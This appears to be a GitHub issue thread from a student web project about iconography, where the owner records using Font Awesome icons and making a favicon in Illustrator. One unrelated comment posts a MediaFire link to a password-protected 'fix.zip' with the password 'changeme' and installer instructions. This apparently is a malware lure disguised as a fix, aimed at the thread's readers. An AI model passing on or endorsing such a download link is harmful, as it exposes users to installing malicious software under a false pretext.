### ISSUE TITLE
Iconography

### ISSUE THREAD

**Issue by Jereriviel** [Jereriviel/semester-project-1#23]
- [x] Create an icon library for the web page.
- [x] Create a fav icon for the web page.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jereriviel** [comment]
Icons will come from Font Awesome, see more details in the Style Guide.

**Comment by Jereriviel** [comment]
Created favicon in Adobe Illustrator.
